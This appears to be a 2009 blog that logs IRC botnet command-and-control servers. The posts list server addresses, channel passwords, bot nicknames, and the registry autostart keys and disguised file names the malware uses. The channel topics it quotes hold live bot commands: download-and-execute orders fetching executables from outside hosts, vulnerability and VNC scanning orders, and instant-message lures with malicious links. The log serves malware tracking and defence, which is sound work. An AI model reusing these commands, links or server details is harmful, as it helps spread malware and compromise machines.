tl6.welovewarez.com DNS_TYPE_A 85.17.141.52
85.17.141.52:6700
Nick: [00|AUT|XP|411848]
Username: SP3-416
Joined Channel: ##!who!## with Password 101#
Channel Topic for Channel ##!who!##: ".sftp welovewarez.com 21 wat l0l1 SCUM.EXE|.asc -S -s|.asc svrsvc_ESP_SP2 100 5 0 148.245.x.x -r -s"
Autostart Path
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
Windows automatic updates = "C:\WINDOWS\system\iexplorer.exe"
Friday, August 28, 2009
tl6.welovewarez.com ( MS08-067 ) ( ALUCARD )
Posted by Role at 3:37 AM 0 comments
Sunday, August 23, 2009
dddd.burimche.net (burimi)
dddd.burimche.net
87.105.154.165:4244
MODE [00|USA|650342] -ix
JOIN ##bb## bole
NICK [00|USA|650342]
USER XP-0248 * 0 :SSC-19116644F03
PASS letmein
NICK [00|USA|200623]
USER XP-6975 * 0 :COMPUTERNAME
Topic is '.msn.stop|.msn.msg new ha ha http://www.fakiratu.com/image.php?='
Set by C-RDP on Sun Aug 23 20:37:36
Auto Startup Path
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Windows UDP Control Center = "fxstaller.exe"
1033 TCP fxstaller.exe (%Windir%\fxstaller.exe)
1034 TCP fxstaller.exe (%Windir%\fxstaller.exe
Posted by Role at 5:26 AM 0 comments
69.64.50.107
69.64.50.107:6667
NICK COMPUTERNAME778
USER UserName ZM ZM COMPUTERNAME
JOIN #phcrulez
NICK COMPUTERNAME859
Autostart Path
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
WinLogon = "%Windir%\svhosr.exe"
1036 TCP svhosr.exe (%Windir%\svhosr.exe
Posted by Role at 5:15 AM 0 comments
Saturday, August 22, 2009
65.23.159.69 (x)
65.23.159.69:38722
User Name: XP-8703
Real Name: MICHAEL
Password: test
Nick Name: [USA|00|P|39732]
Non RFC Conform: 1
Channel
Name: #test
Password: test
Topic Deleted: :.msn.sendzip OMG is this you? |.aim.msg EW! look at this picture of you I found http://allyepic.com/Picture004.jpg |.triton.msg LOL http://allyepic.com/Picture004.jpg
Autostart path
Key:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: svchosts
Data: svchosts.exe
Key:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
Value: svchosts
Data: svchosts.exe
Firewall
Key:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\Authorized
Applications\List
Value: C:\10239953.exe
Data: C:\10239953.exe:*:Enabled:svchosts
Posted by Role at 6:48 AM 0 comments
Friday, August 21, 2009
irc.tiklabosal.net (aBoLt)
*** IP of : 95.168.175.87 host irc.tiklabosal.net
95.168.175.87:6667
Channels
USERHOST USA|9478145
JOIN #Kr@L PASS: !B
JOIN #M3ist3R
MODE USA|9478145 -x+i
Topic is '#advscan asn 200 5 0 -r -b -n -k -j'
.download http://www.tiklabosal.net/kral.exe c:\kral.exe 1 | aBoLt Siker xD
Autostart Path
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Internet Security Service = "expllorer.exe"
C:\WINDOWS\system32\expllorer.exe
Posted by Role at 11:24 PM 0 comments
sip4.voipkosovasite.com (BURIMI GAY NET IS BACK)
sip4.voipkosovasite.com
82.114.87.46:1868
MODE [00|USA|409999] -ix
JOIN #!a!
MODE [00|USA|409999] -ix
JOIN #!a!
Topic
is
'.msn.stop|.msn.msg all models photo news? :D
http://pisi.freewebhostx.com/photos.php?='
-irc.foonet.com- *** Notice -- l (auth@18076492.BE3D884F.78F63BB0.IP) [bobsmith] is now a network administrator (N)
Autostart path
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Framework module library = "C:\WINDOWS\system32\infocard.exe"
Posted by Role at 12:53 PM 0 comments
Wednesday, August 19, 2009
net.anddos.co.uk (anddos)
net.anddos.co.uk DNS_TYPE_A 94.75.216.31
94.75.216.31:6667
MODE [00|USA|XP|SP3]-3806 -i
JOIN #120 bforce
Nick: [00|AUT|XP|SP3]-2415
Username: xyrbyc
Joined Channel: #120 with Password bforce
Channel Topic for Channel #120: ".find vnc-5900 60 3 0 189.x.x.x"
Private Message to Channel #120: "vnc-5900 for 0 minutes 5 delay 60 threads"
.dl http://94.75.216.31:85/~anddos/120c c:\120c.exe 1
Auto Startup
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Intranet = "winvs.exe"
Posted by Role at 1:41 AM 0 comments